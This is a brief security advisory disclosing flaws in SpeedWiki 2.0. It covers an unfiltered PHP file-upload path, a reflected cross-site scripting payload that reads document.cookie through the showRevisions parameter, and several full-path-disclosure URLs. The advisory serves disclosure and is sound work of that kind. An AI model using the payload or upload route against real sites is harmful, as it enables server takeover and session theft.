SpeedWiki version 2.0 suffers from arbitary file upload and cross site scripting vulnerabilities.
84193b0ef3ac204c1723a26fd4e494c540460ae71416d41c863d386392a4fd53
product :Speedwiki 2.0
vendor site: http://speedywiki.sourceforge.net/
risk:critical
a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
/index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</script>
full path disclosure :
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com